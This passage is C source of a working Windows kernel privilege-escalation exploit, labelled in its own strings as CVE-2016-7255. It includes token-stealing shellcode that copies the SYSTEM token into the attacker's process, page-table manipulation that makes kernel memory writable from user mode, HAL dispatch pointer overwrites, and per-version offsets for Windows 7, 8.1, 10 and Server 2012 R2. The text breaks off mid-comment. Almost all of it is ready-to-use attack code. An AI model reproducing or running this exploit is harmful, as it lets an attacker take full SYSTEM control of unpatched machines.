OUT PULONG ReturnLength);\r\n\r\ntypedef NTSTATUS (WINAPI *NtQueryIntervalProfile_t)(IN ULONG ProfileSource,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\tOUT PULONG Interval);\r\n\r\nNtQuerySystemInformation_t NtQuerySystemInformation;\r\nNtQueryIntervalProfile_t NtQueryIntervalProfile;\r\n \r\nchar shellcode[] = {\r\n\t//0xcc,\r\n\t0xfa, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// CLI\r\n\t0x9c, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// PUSHFQ\r\n\t0x48, 0xb8, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, \t// MOV RAX, Original Pointer\r\n\t0x50, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// PUSH RAX\r\n\t0x51, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// PUSH RCX\r\n\t0x48, 0xb9, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, \t// MOV RCX, [OverwriteAddr+OverwriteOffset]\r\n\t0x48, 0x89, 0x01, \t\t\t\t\t\t\t\t\t\t\t\t// MOV QWORD PTR [RCX], RAX\r\n\t0xb9, 0x90, 0x90, 0x90, 0x90, \t\t\t\t\t\t\t\t\t// MOV ECX, PID\r\n\t0x53, 
\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// PUSH RBX\r\n\r\n\t0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, \t\t\t// MOV RAX,QWORD PTR gs:0x188\r\n\t0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00,\t\t\t\t\t\t// MOV RAX,QWORD PTR [RAX+0xb8] EPROCESS\r\n\t0x48, 0x8d, 0x80, 0x90, 0x90, 0x00, 0x00,\t\t\t\t\t\t// LEA RAX,[RAX+0xActiveProcessLinkOffset] \r\n\t//<tag>\r\n\t0x48, 0x8b, 0x00,\t\t\t\t\t\t\t\t\t\t\t\t// MOV RAX,QWORD PTR [RAX]\r\n\t0x48, 0x8b, 0x58, 0xf8,\t\t\t\t\t\t\t\t\t\t\t// MOV RBX,QWORD PTR [RAX-0x8] // UniqueProcessID\r\n\t0x48, 0x83, 0xfb, 0x04,\t\t\t\t\t\t\t\t\t\t\t// CMP RBX,0x4\r\n\t0x75, 0xf3,\t\t\t\t\t\t\t\t\t\t\t\t\t\t// JNE <tag>\r\n\t0x48, 0x8b, 0x98, 0x90, 0x90, 0x90, 0x90,\t\t\t\t\t\t// MOV RBX, QWORD PTR [RAX+0x60] // GET TOKEN of SYSTEM\r\n\r\n\t0x53, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// PUSH RBX\r\n\t//<tag2>\r\n\t0x48, 0x8b, 0x00,\t\t\t\t\t\t\t\t\t\t\t\t// MOV RAX,QWORD PTR [RAX]\r\n\t0x48, 0x8b, 0x58, 0xf8,\t\t\t\t\t\t\t\t\t\t\t// MOV RBX,QWORD PTR [RAX-0x8] // UniqueProcessID\r\n\t0x39, 0xcb,\t\t\t\t\t\t\t\t\t\t\t\t\t\t// CMP EBX, ECX // our PID\r\n\t0x75, 0xf5,\t\t\t\t\t\t\t\t\t\t\t\t\t\t// JNE <tag2>\r\n\t0x5b, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// POP RBX\r\n\t0x48, 0x89, 0x98, 0x90, 0x90, 0x90, 0x90,\t\t\t\t\t\t// MOV QWORD PTR[RAX + 0x60], RBX\r\n\r\n\t0x5b, // POP RBX\r\n\t0x59, // POP RCX\r\n\t0x58, // POP RAX\r\n\t0x9d, // POPFQ\r\n\r\n\t0xfb, // STI\r\n\t0xff, 0xe0 // JMP RAX\r\n};\r\n\r\nULONG __cdecl DbgPrint(__in char* Format, ...)\r\n{\r\n\tCHAR* pszDbgBuff = NULL;\r\n\tva_list VaList = NULL;\r\n\tULONG ulRet = 0;\r\n\r\n\tdo\r\n\t{\r\n\t\tpszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0, 1024 * sizeof(CHAR));\r\n\t\tif (NULL == pszDbgBuff)\r\n\t\t{\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\tRtlZeroMemory(pszDbgBuff, 1024 * sizeof(CHAR));\r\n\r\n\t\tva_start(VaList, Format);\r\n\r\n\t\t_vsnprintf((CHAR*)pszDbgBuff, 1024 - 1, Format, VaList);\r\n\r\n\r\n\t\tOutputDebugStringA(pszDbgBuff);\r\n\r\n\t\tva_end(VaList);\r\n\r\n\t} while 
(FALSE);\r\n\r\n\tif (NULL != pszDbgBuff)\r\n\t{\r\n\t\tHeapFree(GetProcessHeap(), 0, pszDbgBuff);\r\n\t\tpszDbgBuff = NULL;\r\n\t}\r\n\r\n\treturn ulRet;\r\n}\r\n\r\n\r\nint _sim_key_down(WORD wKey)\r\n{\r\n\tINPUT stInput = { 0 };\r\n\r\n\tdo\r\n\t{\r\n\t\tstInput.type = INPUT_KEYBOARD;\r\n\t\tstInput.ki.wVk = wKey;\r\n\t\tstInput.ki.dwFlags = 0;\r\n\r\n\t\tSendInput(1, &stInput, sizeof(stInput));\r\n\r\n\t} while (FALSE);\r\n\r\n\treturn 0;\r\n}\r\n\r\nint _sim_key_up(WORD wKey)\r\n{\r\n\tINPUT stInput = { 0 };\r\n\r\n\tdo\r\n\t{\r\n\t\tstInput.type = INPUT_KEYBOARD;\r\n\t\tstInput.ki.wVk = wKey;\r\n\t\tstInput.ki.dwFlags = KEYEVENTF_KEYUP;\r\n\r\n\t\tSendInput(1, &stInput, sizeof(stInput));\r\n\r\n\t} while (FALSE);\r\n\r\n\treturn 0;\r\n}\r\n\r\nint _sim_alt_shift_esc()\r\n{\r\n\tint i = 0;\r\n\r\n\tdo\r\n\t{\r\n\t\t_sim_key_down(VK_MENU);\r\n\t\t_sim_key_down(VK_SHIFT);\r\n\r\n\r\n\t\t_sim_key_down(VK_ESCAPE);\r\n\t\t_sim_key_up(VK_ESCAPE);\r\n\r\n\t\t_sim_key_down(VK_ESCAPE);\r\n\t\t_sim_key_up(VK_ESCAPE);\r\n\r\n\t\t_sim_key_up(VK_MENU);\r\n\t\t_sim_key_up(VK_SHIFT);\r\n\r\n\r\n\t} while (FALSE);\r\n\r\n\treturn 0;\r\n}\r\n\r\n\r\n\r\nint _sim_alt_shift_tab(int nCount)\r\n{\r\n\tint i = 0;\r\n\tHWND hWnd = NULL;\r\n\r\n\r\n\tint nFinalRet = -1;\r\n\r\n\tdo\r\n\t{\r\n\t\t_sim_key_down(VK_MENU);\r\n\t\t_sim_key_down(VK_SHIFT);\r\n\r\n\r\n\t\tfor (i = 0; i < nCount; i++)\r\n\t\t{\r\n\t\t\t_sim_key_down(VK_TAB);\r\n\t\t\t_sim_key_up(VK_TAB);\r\n\r\n\t\t\tSleep(1000);\r\n\r\n\t\t}\r\n\r\n\r\n\t\t_sim_key_up(VK_MENU);\r\n\t\t_sim_key_up(VK_SHIFT);\r\n\t} while (FALSE);\r\n\r\n\treturn nFinalRet;\r\n}\r\n\r\nint _sim_alt_esc(int count)\r\n{\r\n\tint i = 0;\r\n\r\n\tfor (i = 0; i<count; 
i++)\r\n\t{\r\n\t\t_sim_key_down(VK_MENU);\r\n\t\t//_sim_key_down(VK_SHIFT);\r\n\r\n\r\n\t\t_sim_key_down(VK_ESCAPE);\r\n\t\t_sim_key_up(VK_ESCAPE);\r\n\r\n\t\t_sim_key_down(VK_ESCAPE);\r\n\t\t_sim_key_up(VK_ESCAPE);\r\n\r\n\t\t_sim_key_up(VK_MENU);\r\n\t\t//_sim_key_up(VK_SHIFT);\r\n\r\n\t}\r\n\r\n\treturn 0;\r\n}\r\n\r\n\r\nint or_address_value_4(__in void* pAddress)\r\n{\r\n\tWNDCLASSEXW stWC = { 0 };\r\n\r\n\tHWND hWndParent = NULL;\r\n\tHWND hWndChild = NULL;\r\n\r\n\tWCHAR* pszClassName = L\"cve-2016-7255\";\r\n\tWCHAR* pszTitleName = L\"cve-2016-7255\";\r\n\r\n\tvoid* pId = NULL;\r\n\tMSG stMsg = { 0 };\r\n\r\n\tUINT64 value = 0;\r\n\r\n\tdo\r\n\t{\r\n\r\n\t\tstWC.cbSize = sizeof(stWC);\r\n\t\tstWC.lpfnWndProc = DefWindowProcW;\r\n\t\tstWC.lpszClassName = pszClassName;\r\n\r\n\t\tif (0 == RegisterClassExW(&stWC))\r\n\t\t{\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\thWndParent = CreateWindowExW(\r\n\t\t\t0,\r\n\t\t\tpszClassName,\r\n\t\t\tNULL,\r\n\t\t\tWS_OVERLAPPEDWINDOW | WS_VISIBLE,\r\n\t\t\t0,\r\n\t\t\t0,\r\n\t\t\t360,\r\n\t\t\t360,\r\n\t\t\tNULL,\r\n\t\t\tNULL,\r\n\t\t\tGetModuleHandleW(NULL),\r\n\t\t\tNULL\r\n\t\t);\r\n\r\n\t\tif (NULL == hWndParent)\r\n\t\t{\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\thWndChild = CreateWindowExW(\r\n\t\t\t0,\r\n\t\t\tpszClassName,\r\n\t\t\tpszTitleName,\r\n\t\t\tWS_OVERLAPPEDWINDOW | WS_VISIBLE | WS_CHILD,\r\n\t\t\t0,\r\n\t\t\t0,\r\n\t\t\t160,\r\n\t\t\t160,\r\n\t\t\thWndParent,\r\n\t\t\tNULL,\r\n\t\t\tGetModuleHandleW(NULL),\r\n\t\t\tNULL\r\n\t\t);\r\n\r\n\t\tif (NULL == hWndChild)\r\n\t\t{\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n#ifdef _WIN64\r\n\t\tpId = ((UCHAR*)pAddress - 0x28);\r\n#else\r\n\t\tpId = ((UCHAR*)pAddress - 0x14);\r\n#endif // #ifdef _WIN64\r\n\r\n\t\tSetWindowLongPtr(hWndChild, GWLP_ID, (LONG_PTR)pId);\r\n\r\n\t\tDbgPrint(\"hWndChild = 0x%p\\n\", hWndChild);\r\n\r\n\t\tShowWindow(hWndParent, SW_SHOWNORMAL);\r\n\r\n\t\tSetParent(hWndChild, 
GetDesktopWindow());\r\n\r\n\t\tSetForegroundWindow(hWndChild);\r\n\r\n\t\t_sim_alt_shift_tab(4);\r\n\r\n\t\tSwitchToThisWindow(hWndChild, TRUE);\r\n\r\n\t\t_sim_alt_shift_esc();\r\n\r\n\t\twhile (GetMessage(&stMsg, NULL, 0, 0)) {\r\n\t\t\t\r\n\t\t\tSetFocus(hWndParent);\r\n\t\t\t_sim_alt_esc(20);\r\n\t\t\tSetFocus(hWndChild);\r\n\t\t\t_sim_alt_esc(20);\r\n\r\n\t\t\tTranslateMessage(&stMsg);\r\n\t\t\tDispatchMessage(&stMsg);\r\n\t\t\t\r\n\t\t\tif (value != 0) {\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\t\r\n\r\n\t\t\t__try {\r\n\t\t\t\tvalue = *(UINT64 *)PML4_SELF_REF;\r\n\t\t\t\tif ((value & 0x67) == 0x67) {\r\n\t\t\t\t\tprintf(\"Value Self Ref = %llx\\n\", value);\r\n\t\t\t\t\tbreak;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\t__except (EXCEPTION_EXECUTE_HANDLER) {\r\n\t\t\t\tcontinue;\r\n\t\t\t}\r\n\r\n\t\t}\r\n\r\n\r\n\t} while (FALSE);\r\n\r\n\tif (NULL != hWndParent)\r\n\t{\r\n\t\tDestroyWindow(hWndParent);\r\n\t\thWndParent = NULL;\r\n\t}\r\n\r\n\tif (NULL != hWndChild)\r\n\t{\r\n\t\tDestroyWindow(hWndChild);\r\n\t\thWndChild = NULL;\r\n\t}\r\n\r\n\tUnregisterClassW(pszClassName, GetModuleHandleW(NULL));\r\n\r\n\treturn 0;\r\n}\r\n\r\nUINT64 get_pxe_address(UINT64 address) {\r\n\tUINT entry = PML4_SELF_REF_INDEX;\r\n\tUINT64 result = address >> 9;\r\n\tUINT64 lower_boundary = ((UINT64)0xFFFF << 48) | ((UINT64)entry << 39);\r\n\tUINT64 upper_boundary = (((UINT64)0xFFFF << 48) | ((UINT64)entry << 39) + 0x8000000000 - 1) & 0xFFFFFFFFFFFFFFF8;\r\n\tresult = result | lower_boundary;\r\n\tresult = result & upper_boundary;\r\n\treturn result;\r\n}\r\n\r\nUINT64 look_free_entry_pml4(void) {\r\n\t// Looks for a free pml4e in the last 0x100 bytes of the PML4\r\n\tint offset = 0xF00;\r\n\tUINT64 pml4_search = PML4_BASE + offset;\r\n\twhile (offset < 0xFF8)\r\n\t{\r\n\t\tif ((*(PVOID *)pml4_search) == 0x0)\r\n\t\t{\r\n\t\t\t// This is a NULL (free) entry\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\toffset += 8;\r\n\t\tpml4_search = PML4_BASE + offset;\r\n\t}\r\n\treturn 
pml4_search;\r\n}\r\n\r\nUINT64 calculate_spurious_pt_address(UINT64 spurious_offset) {\r\n\tUINT64 index = (spurious_offset & 0xFFF) / 8;\r\n\tUINT64 result = (\r\n\t\t((UINT64)0xFFFF << 48) |\r\n\t\t((UINT64)PML4_SELF_REF_INDEX << 39) |\r\n\t\t((UINT64)PML4_SELF_REF_INDEX << 30) |\r\n\t\t((UINT64)PML4_SELF_REF_INDEX << 21) |\r\n\t\t(index << 12)\r\n\t\t);\r\n\treturn result;\r\n}\r\n\r\n\r\n\r\nUINT64 create_spurious_pte_to_virtual_address(UINT64 virtual_address, BOOL patch_original) {\r\n\r\n\t/*\r\n\t1: kd> !pte ffffffff`ffd00000\r\n\tVA ffffffffffd00000\r\n\tPXE at FFFFF6FB7DBEDFF8 PPE at FFFFF6FB7DBFFFF8 PDE at FFFFF6FB7FFFFFF0 PTE at FFFFF6FFFFFFE800\r\n\tcontains 0000000000A1F063 contains 0000000000A20063 contains 0000000000A25063 contains 8000000000103963\r\n\tpfn a1f-- - DA--KWEV pfn a20-- - DA--KWEV pfn a25-- - DA--KWEV pfn 103 - G - DA--KW - V\r\n\t*/\t\r\n\r\n\tUINT64 pte = get_pxe_address(virtual_address);\r\n\tint pte_offset = pte & 0xFFF;\r\n\t//printf(\"PTE: %llx, %x\\n\", pte, pte_offset);\r\n\t\r\n\tUINT64 pde = get_pxe_address(pte);\r\n\tint pde_offset = pde & 0xFFF;\r\n\t//printf(\"PDE: %llx, %x\\n\", pde, pde_offset);\r\n\t\t\r\n\tUINT64 pdpte = get_pxe_address(pde);\r\n\tint pdpte_offset = pdpte & 0xFFF;\r\n\t//printf(\"PDPTE: %llx,%x\\n\", pdpte, pdpte_offset);\r\n\t\t\r\n\tUINT64 pml4e = get_pxe_address(pdpte);\r\n\tint pml4e_offset = pml4e & 0xFFF;\r\n\t//printf(\"PML4E: %llx\\n\", pml4e, pml4e_offset);\r\n\t\r\n\tUINT64 spurious_offset = look_free_entry_pml4();\r\n\tprintf(\"[+] Selected spurious PML4E: %llx\\n\", spurious_offset);\r\n\tUINT64 f_e_pml4 = spurious_offset;\r\n\tUINT64 spurious_pt = calculate_spurious_pt_address(spurious_offset);\r\n\tprintf(\"[+] Spurious PT: %llx\\n\", spurious_pt);\r\n\tprintf(\"--------------------------------------------------\\n\\n\");\r\n\t\r\n\t\r\n\t//Read the physical address of pml4e\t\r\n\tUINT64 pml4e_pfn = (UINT64)(*(PVOID *)pml4e);\r\n\tprintf(\"[+] Content pml4e %llx: %llx\\n\", pml4e, 
pml4e_pfn);\r\n\t// Change the PxE\r\n\tpml4e_pfn = pml4e_pfn | 0x67; // Set U/S\r\n\t\r\n\tprintf(\"[+] Patching the Spurious Offset (PML4e) %llx: %llx\\n\",f_e_pml4, pml4e_pfn);\r\n\t*((PVOID *)spurious_offset) = (PVOID)pml4e_pfn;\r\n\tSleep(0x1); // Sleep for TLB refresh;\r\n\t\r\n\t//Read the physical address of pdpte\r\n\tUINT64 pdpte_pfn = (UINT64) *(PVOID *)(spurious_pt + pdpte_offset);\r\n\tprintf(\"[+] Content pdpte %llx: %llx\\n\", pdpte, pdpte_pfn);\r\n\t// Change the PxE\r\n\tpdpte_pfn = pdpte_pfn | 0x67; // Set U/S\r\n\tprintf(\"[+] Patching the Spurious Offset (PDPTE) %llx: %llx\\n\", spurious_offset, pdpte_pfn);\r\n\t*((PVOID *)spurious_offset) = (PVOID)pdpte_pfn;\r\n\tSleep(0x1); // Sleep for TLB refresh;\r\n\t\r\n\t//Read the physical address of pde\r\n\tUINT64 pde_addr = spurious_pt + pde_offset;\r\n\tUINT64 pde_pfn = (UINT64) *(PVOID *)(spurious_pt + pde_offset);\r\n\tprintf(\"[+] Content pdpe %llx: %llx\\n\", pde, pde_pfn);\r\n\t// Change the PxE\r\n\tpde_pfn = pde_pfn | 0x67; // Set U/S\r\n\tprintf(\"[+] Patching the Spurious Offset (PDE) %llx: %llx\\n\", spurious_offset, pde_pfn);\r\n\t*((PVOID *)spurious_offset) = (PVOID)pde_pfn;\r\n\tSleep(0x1); // Sleep for TLB refresh;\r\n\t\r\n\t//Read the physical address of pte\r\n\tUINT64 pte_addr = spurious_pt + pte_offset;\r\n\tUINT64 pte_pfn = (UINT64) *(PVOID *)(spurious_pt + pte_offset);\r\n\tprintf(\"[+] Content pte %llx: %llx\\n\", pte, pte_pfn);\r\n\t// Change the PxE\r\n\tpte_pfn = pte_pfn | 0x67; // Set U/S\r\n pte_pfn = pte_pfn & 0x7fffffffffffffff; // Turn off NX \r\n\tif (patch_original) {\r\n\t\tprintf(\"*** Patching the original location to enable NX...\\n\");\r\n\t\t*(PVOID *)(spurious_pt + pte_offset) = (PVOID)pte_pfn;\r\n\t}\r\n \r\n\tprintf(\"[+] Patching the Spurious Offset (PTE) %llx: %llx\\n\", spurious_offset, pte_pfn);\r\n\t*((PVOID *)spurious_offset) = (PVOID)pte_pfn;\r\n\tSleep(0x1); // Sleep for TLB refresh;\r\n\tprintf(\"\\n\\n\");\r\n\treturn spurious_pt;\r\n}\r\n\r\nUINT64 
get_OverwriteAddress_pointer(UINT64 target_address, int target_offset) {\r\n\tprintf(\"[*] Getting Overwrite pointer: %llx\\n\", target_address);\r\n\tUINT64 OverwriteAddress = create_spurious_pte_to_virtual_address(target_address, FALSE);\r\n\tOverwriteAddress += (target_address & 0xFFF);\r\n\tprintf(\"OverwriteAddress: %llx\\n\", OverwriteAddress);\r\n\treturn (UINT64) *((PVOID *)(((char *)OverwriteAddress) + target_offset));\r\n}\r\n\r\nvoid overwrite_TargetAddress(UINT64 hook_address, UINT64 target_address, int target_offset) {\r\n\tUINT64 OverwriteTarget = create_spurious_pte_to_virtual_address(target_address, FALSE);\r\n\tOverwriteTarget += (target_address & 0xFFF);\r\n\tUINT64 target = (UINT64)((char *)OverwriteTarget) + target_offset;\r\n\tprintf(\"Patch OverwriteTarget: %llx with %llx\\n\", target, hook_address);\r\n\t*(PVOID *)target = (PVOID)hook_address;\r\n}\r\n\r\n\r\nUINT64 store_shellcode_in_hal(void) {\r\n\t//// Finally store the shellcode on the HAL\r\n\r\n\tUINT64 hal_heap_addr = 0xFFFFFFFFFFD00000;\r\n\tUINT64 hal_heap = create_spurious_pte_to_virtual_address(hal_heap_addr, TRUE);\r\n\r\n\tprintf(\"HAL address: %llx\\n\", hal_heap);\r\n\t// 0xffffffffffd00d50 this is a good offset to store shellcode \r\n\t// 0xfff - 0xd50 = 0x2af space\r\n\r\n\tmemcpy(((char *)hal_heap) + 0xd50, shellcode, sizeof(shellcode));\r\n\treturn 0xffffffffffd00d50;\r\n}\r\n\r\nUINT64 GetHalDispatchTable() {\r\n PCHAR KernelImage;\r\n SIZE_T ReturnLength;\r\n HMODULE hNtDll = NULL;\r\n UINT64 HalDispatchTable;\r\n HMODULE hKernelInUserMode = NULL;\r\n PVOID KernelBaseAddressInKernelMode;\r\n NTSTATUS NtStatus = STATUS_UNSUCCESSFUL;\r\n PSYSTEM_MODULE_INFORMATION pSystemModuleInformation;\r\n\r\n hNtDll = LoadLibrary(\"ntdll.dll\");\r\n\r\n if (!hNtDll) {\r\n printf(\"\\t\\t\\t[-] Failed To Load NtDll.dll: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n NtQuerySystemInformation = (NtQuerySystemInformation_t)GetProcAddress(hNtDll, 
\"NtQuerySystemInformation\");\r\n\r\n if (!NtQuerySystemInformation) {\r\n printf(\"\\t\\t\\t[-] Failed Resolving NtQuerySystemInformation: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n NtStatus = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &ReturnLength);\r\n\r\n // Allocate the Heap chunk\r\n pSystemModuleInformation = (PSYSTEM_MODULE_INFORMATION)HeapAlloc(GetProcessHeap(),\r\n HEAP_ZERO_MEMORY,\r\n ReturnLength);\r\n\r\n if (!pSystemModuleInformation) {\r\n printf(\"\\t\\t\\t[-] Memory Allocation Failed For SYSTEM_MODULE_INFORMATION: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n NtStatus = NtQuerySystemInformation(SystemModuleInformation,\r\n pSystemModuleInformation,\r\n ReturnLength,\r\n &ReturnLength);\r\n\r\n if (NtStatus != STATUS_SUCCESS) {\r\n printf(\"\\t\\t\\t[-] Failed To Get SYSTEM_MODULE_INFORMATION: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n KernelBaseAddressInKernelMode = pSystemModuleInformation->Module[0].Base;\r\n KernelImage = strrchr((PCHAR)(pSystemModuleInformation->Module[0].ImageName), '\\\\') + 1;\r\n\r\n printf(\"\\t\\t\\t[+] Loaded Kernel: %s\\n\", KernelImage);\r\n printf(\"\\t\\t\\t[+] Kernel Base Address: 0x%p\\n\", KernelBaseAddressInKernelMode);\r\n \r\n hKernelInUserMode = LoadLibraryA(KernelImage);\r\n\r\n if (!hKernelInUserMode) {\r\n printf(\"\\t\\t\\t[-] Failed To Load Kernel: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n // This is still in user mode\r\n HalDispatchTable = (UINT64)GetProcAddress(hKernelInUserMode, \"HalDispatchTable\");\r\n\r\n if (!HalDispatchTable) {\r\n printf(\"\\t\\t\\t[-] Failed Resolving HalDispatchTable: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n else {\r\n HalDispatchTable = (ULONGLONG)HalDispatchTable - (ULONGLONG)hKernelInUserMode;\r\n\r\n // Here we get the address of HapDispatchTable in Kernel mode\r\n HalDispatchTable = ((ULONGLONG)HalDispatchTable + 
(ULONGLONG)KernelBaseAddressInKernelMode);\r\n printf(\"\\t\\t\\t[+] HalDispatchTable: 0x%llx\\n\", HalDispatchTable);\r\n }\r\n\r\n HeapFree(GetProcessHeap(), 0, (LPVOID)pSystemModuleInformation);\r\n\r\n if (hNtDll) {\r\n FreeLibrary(hNtDll);\r\n }\r\n\r\n if (hKernelInUserMode) {\r\n FreeLibrary(hKernelInUserMode);\r\n }\r\n\r\n hNtDll = NULL;\r\n hKernelInUserMode = NULL;\r\n pSystemModuleInformation = NULL;\r\n\r\n return HalDispatchTable;\r\n}\r\n\r\nint __cdecl main(int argc, char** argv)\r\n{\r\n\tTCHAR pre_username[256];\r\n\tTCHAR post_username[256];\r\n\tDWORD size = 256;\r\n\tULONG Interval = 0;\r\n\tHMODULE hNtDll = NULL;\r\n\tUINT retval;\r\n UINT64 overwrite_address;\r\n int overwrite_offset;\r\n \r\n // define operating system version specific variables\r\n unsigned char sc_KPROCESS;\r\n unsigned int sc_TOKEN;\r\n unsigned int sc_APLINKS;\r\n\tint osversion;\r\n\r\n\tif (argc != 2) {\r\n\t\tprintf(\"Please enter an OS version\\n\");\r\n\t\tprintf(\"The following OS'es are supported:\\n\");\r\n\t\tprintf(\"\\t[*] 7 - Windows 7\\n\");\r\n\t\tprintf(\"\\t[*] 81 - Windows 8.1\\n\");\r\n\t\tprintf(\"\\t[*] 10 - Windows 10 prior to build release 14393 (Anniversary Update)\\n\");\r\n\t\tprintf(\"\\t[*] 12 - Windows 2012 R2\\n\");\r\n\t\tprintf(\"\\n\");\r\n\t\tprintf(\"\\t[*] For example: cve-2016-7255.exe 7 -- for Windows 7\\n\");\r\n\t\treturn -1;\r\n\t}\r\n\t\r\n\tosversion = _strtoui64(argv[1], NULL, 10);\r\n\t\r\n if(osversion == 7) \r\n {\r\n // the target machine's OS is Windows 7 SP1\r\n printf(\" [+] Windows 7 SP1\\n\");\r\n sc_KPROCESS = 0x70;\t\t\t// dt -r1 nt!_KTHREAD +0x050 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\r\n sc_TOKEN = 0x80;\t\t\t// dt -r1 nt!_EPROCESS [+0x208 Token : _EX_FAST_REF] - [+0x188 ActiveProcessLinks : _LIST_ENTRY] = (0x80)\r\n sc_APLINKS = 0x188;\t\t// dt -r1 nt!_EPROCESS +0x188 ActiveProcessLinks : _LIST_ENTRY\r\n \r\n overwrite_address = GetHalDispatchTable(); // HalDispatchTable\r\n overwrite_offset = 
0x8; \t\t\t\t// QueryIntervalProfile \r\n }\r\n\telse if(osversion == 81)\r\n {\r\n // the target machine's OS is Windows 8.1\r\n printf(\" [+] Windows 8.1\\n\");\r\n sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\r\n sc_TOKEN = 0x60; // dt -r1 nt!_EPROCESS [+0x348 Token : _EX_FAST_REF] - [+0x2e8 ActiveProcessLinks : _LIST_ENTRY] = (0x60)\r\n sc_APLINKS = 0x2e8; \t// dt -r1 nt!_EPROCESS +0x2e8 ActiveProcessLinks : _LIST_ENTRY\r\n \r\n overwrite_address = 0xffffffffffd00510; // HalpInterruptController_address (dq poi(hal!HalpInterruptController))\r\n overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)\r\n }\r\n\telse if(osversion == 10)\r\n {\r\n // the target machine's OS is Windows 10 prior to build 14393\r\n printf(\" [+] Windows 10\\n\");\r\n sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\r\n sc_TOKEN = 0x68; // dt -r1 nt!_EPROCESS [+0x358 Token : _EX_FAST_REF] - [+0x2f0 ActiveProcessLinks : _LIST_ENTRY] = (0x60)\r\n sc_APLINKS = 0x2f0; // dt -r1 nt!_EPROCESS +0x2f0 ActiveProcessLinks : _LIST_ENTRY\r\n \r\n overwrite_address = 0xffffffffffd004c0; // HalpInterruptController_address (dq poi(hal!HalpInterruptController)\r\n overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)\r\n }\r\n\telse if(osversion == 12)\r\n {\r\n // the target machine's OS is Windows 2012 R2\r\n printf(\" [+] Windows 2012 R2\\n\");\r\n sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\r\n sc_TOKEN = 0x60; // dt -r1 nt!_EPROCESS [+0x348 Token : _EX_FAST_REF] - [+0x2e8 ActiveProcessLinks : _LIST_ENTRY] = (0x60)\r\n sc_APLINKS = 0x2e8; // dt -r1 nt!_EPROCESS +0x2e8 ActiveProcessLinks : _LIST_ENTRY\r\n \r\n overwrite_address = 0xffffffffffd12c70; // HalpInterruptController_address (dq poi(hal!HalpInterruptController)\r\n overwrite_offset = 0x78; 
// HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)\r\n }\r\n // in case the OS version is not any of the previously checked versions\r\n else\r\n {\r\n printf(\" [-] Unsupported version\\n\");\r\n printf(\" [*] Affected 64-bit operating systems\\n\");\r\n printf(\" [*] Windows 7 SP1 -- cve-2016-7255.exe 7\\n\");\r\n\t\tprintf(\" [*] Windows 8.1 -- cve-2016-7255.exe 81\\n\");\r\n\t\tprintf(\" [*] Windows 10 before build 14393 -- cve-2016-7255.exe 10\\n\");\r\n\t\tprintf(\"\t\t [*] Windows 2012 R2\t\t\t -- cve-2016-7255.exe 12\\n\");\r\n return -1;\r\n }\r\n \r\n\tprintf(\"My PID is: %d\\n\", GetCurrentProcessId());\r\n GetUserName(pre_username, &size);\r\n\tprintf(\"Current Username: %s\\n\", pre_username);\r\n\tprintf(\"PML4 Self Ref: %llx\\n\", PML4_SELF_REF);\r\n printf(\"Shellcode stored at: %p\\n\", (void *) &shellcode);\r\n\tprintf(\"Enter to continue...\\n\");\r\n\tgetchar();\r\n\r\n\tdo\r\n\t{\r\n\t\tor_address_value_4((void*)PML4_SELF_REF);\r\n\t} while (FALSE);\r\n\r\n\tPML4_SELF_REF_INDEX = GET_INDEX((UINT64)PML4_SELF_REF);\r\n\tprintf(\"[*] Self Ref Index: %x\\n\", PML4_SELF_REF_INDEX);\r\n\tPML4_BASE = ((UINT64)PML4_SELF_REF & (UINT64)0xFFFFFFFFFFFFF000);\r\n\t\r\n UINT64 original_pointer = get_OverwriteAddress_pointer(overwrite_address, overwrite_offset);\r\n\r\n\tprintf(\"Original OverwriteTarget pointer: %llx\\n\", original_pointer);\r\n\tDWORD pid = GetCurrentProcessId();\r\n \r\n /* Shellcode Patching !! 
